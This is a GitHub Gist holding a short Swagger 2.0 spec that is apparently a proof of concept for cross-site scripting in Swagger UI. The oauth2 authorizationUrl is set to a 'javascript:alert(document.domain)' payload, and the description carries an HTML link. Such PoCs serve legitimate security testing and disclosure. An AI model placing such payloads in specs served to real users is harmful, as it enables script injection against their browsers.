Last active
October 18, 2022 08:48
-
-
Save pranav1hivarekar/2a2e1b915067405a71327f61a8399785 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
securityDefinitions: | |
a: | |
type: oauth2 | |
authorizationUrl: javascript:alert(document.domain)// | |
info: | |
version: "0.0.1" | |
title: Example Title | |
description: Click here for <a href="https://cobalt.io">Information</a> | |
paths: | |
/: | |
get: | |
responses: | |
200: | |
description: Successful respons |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment